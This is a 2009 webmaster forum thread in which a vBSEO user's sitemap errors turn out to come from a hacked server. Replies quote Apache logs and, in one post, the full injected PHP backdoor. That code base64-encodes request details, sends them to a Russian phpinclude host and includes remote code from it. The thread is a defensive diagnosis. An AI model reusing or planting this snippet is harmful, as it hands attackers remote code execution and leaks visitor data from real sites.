Webmaster Tools Errors

**Andy R** · 02-17-2009 02:53 AM

I am getting really frustrated with some strange issue that randomly started last month. It seems to me that Google is for some reason unable to see some of the files on this one server I have.

Basically I logged into Webmaster Tools and saw that a few sites were showing errors. The one thing all those sites have in common is that they are on the same server. I searched here on the vBSEO forums and followed all the instructions to delete the files and re-run the scripts so new sitemaps would be made but that did not help. I get the same error.

Attached are screen shots of the errors and following are links to the files (which exist and should be the proper file format). Do you all have any suggestions on what I can try next so Google can see my sitemaps?

Following are links to files that Google says are:

Unsupported file format
Your Sitemap does not appear to be in a supported format. Please ensure it meets our Sitemap guidelines and resubmit.

Click on them and you will see they work fine...

http://www.clubtouareg.com/forums/sitemap_index.xml.gz
http://www.ityt.com/forums/sitemap_index.xml.gz
http://www.wranglerforum.com/sitemap_index.xml.gz

What should I try now to get Google to be able to accept these site maps?

**marco1** · 02-17-2009 04:51 AM

Please Make sure file vbseo_sitemap/data/downloads.dat are 666

**Oleg Ignatiuk** · 02-17-2009 12:18 PM

What is your .htaccess file content? It looks like your site is rendered differently for googlebot.
It might be a malicious code or just misconfigured vB mod somewhere on your sites, check what is indexed by google: site:www.clubtouareg.com/forums - Google Search

**Andy R** · 02-17-2009 04:12 PM

My server admins are telling me it's a vBSEO issue. Here is their comments:

/usr/local/apache/logs/error_log:7436947:[Mon Feb 16 17:23:32 2009] [error] PHP Warning: Cannot modify header information - headers already sent by (output started at http://bdafhzzazbzff.users.phpinclud...VyZm9ydW0uY29t
.d3d3LndyYW5nbGVyZm9ydW0uY29t.L2F0dGFjaG1lbnQucGhw P2F0dGFjaG1lbnRpZD01ODU4JmQ9MTIzMTExNDM1Mg==.TW96a WxsYS81LjAgKGNvbXBhdGlibGU7IFlhaG9vISBTbHVycDsgaHR 0cDovL2hlbHAueWFob28uY29tL2hlbHAvdXMveXNlYXJjaC9zb HVycCk=.NzIuMzAuMTYxLjI1Mw==.:5) in /h
ome/sk-core/attachment.php on line 111
/usr/local/apache/logs/error_log:7441754:[Mon Feb 16 18:05:04 2009] [error] PHP Warning: Cannot modify header information - headers already sent by (output started at http://bdafhzzazbzff.users.phpinclud...VyZm9ydW0uY29t
.d3d3LndyYW5nbGVyZm9ydW0uY29t.L2ltYWdlLnBocD91PTQ0 NjImZGF0ZWxpbmU9MTE5NTczNzAyMQ==.TW96aWxsYS81LjAgK GNvbXBhdGlibGU7IEdvb2dsZWJvdC8yLjE7ICtodHRwOi8vd3d 3Lmdvb2dsZS5jb20vYm90Lmh0bWwp.NjYuMjQ5LjcxLjQ2.:5) in /home/sk-core/image.php on line 34
/usr/local/apache/logs/error_log:7498364:[Tue Feb 17 00:03:32 2009] [error] PHP Warning: Cannot modify header information - headers already sent by (output started at http://bdafhzzazbzff.users.phpinclud...VyZm9ydW0uY29t
.d3d3LndyYW5nbGVyZm9ydW0uY29t.L2ltYWdlLnBocD91PTky MjAmZGF0ZWxpbmU9MTIzMTEwMzk5Ng==.R29vZ2xlYm90LUltY WdlLzEuMA==.NjYuMjQ5LjcxLjQ1.:5) in /home/sk-core/image.php on line 34
/usr/local/apache/logs/error_log:7520371:[Tue Feb 17 07:28:43 2009] [error] PHP Warning: Cannot modify header information - headers already sent by (output started at http://bdafhzzazbzff.users.phpinclud...VyZm9ydW0uY29t
.d3d3LndyYW5nbGVyZm9ydW0uY29t.L2ltYWdlLnBocD91PTQy OCZkYXRlbGluZT0xMjMwMzUwNTYw.R29vZ2xlYm90LUltYWdlL zEuMA==.NjYuMjQ5LjcxLjQ3.:5) in /home/sk-core/image.php on line 34
/usr/local/apache/logs/error_log:7521410:[Tue Feb 17 07:39:46 2009] [error] PHP Warning: Cannot modify header information - headers already sent by (output started at http://bdafhzzazbzff.users.phpinclud...VyZm9ydW0uY29t
.d3d3LndyYW5nbGVyZm9ydW0uY29t.L2ltYWdlLnBocD91PTU2 ODImZGF0ZWxpbmU9MTIxNDQyMDIxNw==.R29vZ2xlYm90LUltY WdlLzEuMA==.NjYuMjQ5LjcxLjQ3.:1) in /home/sk-core/image.php on line 34
/usr/local/apache/logs/error_log:7530592:[Tue Feb 17 09:32:24 2009] [error] PHP Warning: Cannot modify header information - headers already sent by (output started at http://bdafhzzazbzff.users.phpinclud...VyZm9ydW0uY29t
.d3d3LndyYW5nbGVyZm9ydW0uY29t.L2F0dGFjaG1lbnQucGhw P2F0dGFjaG1lbnRpZD03NzUmZD0xMTYxNjIwNzg0.TW96aWxsY S81LjAgKGNvbXBhdGlibGU7IFlhaG9vISBTbHVycDsgaHR0cDo vL2hlbHAueWFob28uY29tL2hlbHAvdXMveXNlYXJjaC9zbHVyc Ck=.NzQuNi4xOC4yNTQ=.:1) in /home/sk-c
ore/attachment.php on line 110

Seems it is related to vbseo, if you go to "current page" it is actually working ok. I would suggest you to refresh Vbseo and check if it is on it's latest version.

**Oleg Ignatiuk** · 02-17-2009 08:21 PM

You should find the mod/script that refers to "bdafhzzazbzea.users.phpinclude.ru" on your site, as you can see in the listing (vBSEO is not related to), then you'll be able to fix it.

**woostar** · 02-17-2009 08:27 PM

you sure you haven't been hijacked? it looks like a faultly/badly coded product vulnerability maybe?

Club Touareg Forums

google is caching loads of warez links

**woostar** · 02-17-2009 09:00 PM

Yep you've been hacked; bummer! Not a vBSEO problem.

**Andy R** · 02-17-2009 10:51 PM

Could have been caused by file permissions within vBSEO? I am trying to understand if this breach is a vBSEO issue or something within my server?

Have you all seen this before?

**briansol** · 02-18-2009 01:15 AM

looks like they are trying to do some bad stuff with remote images/attachments, aka serving php scripts as "image.jpg" but with a mine type of application/php, which then throws the header error.

So, to me, it looks like someone is TRYING to hack, but isn't necessarily been sucessful.

None of that is in your sitemap from what i can tell. sitemap file looks fine.
i'd just re-submit and see what happens.

you might want to block some ruissian IP's too...

**Oleg Ignatiuk** · 02-18-2009 05:23 AM

Try to search all your files on the website and all vB products code for that URL.

If you need help, please open a ticket with server access details to check that.

**woostar** · 02-18-2009 10:02 AM

The code they use (apparently) looks like this (their url is code into base64):

PHP Code:


error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}

Looks like they mainly target old versions of wordpress (although obviously they like any hacker use any exploit to get into other scripts).
Also read that they leave loads of backdoor php files dotted about under generic names, so would suggest you do a serverwise scan.

**Andy R** · 02-19-2009 12:29 AM

woostar, thanks for posting that info. I got the crap edited out of the vbseo_config.php files (which were causing the issues) and in a brief look around my server I see some other files scatter around with their code inside. Mostly date.php and time.php files.

Can you explain to me how they got in and what kind of access they had. Were they able to get into the server and look around the file system? Did they have full access to the server?

Webmaster Tools Errors

LinkBack

Thread Tools

Display

Webmaster Tools Errors

Similar Threads

Google webmaster tools says I'm having sitemap errors

Google webmaster tools - Errors for URLs in Sitemaps 4094URLs restricted by robots.txt 5201

2 different sitemap & webmaster tools

Google Webmaster Tools

WebMaster Tools - Coming Soon

Posting Permissions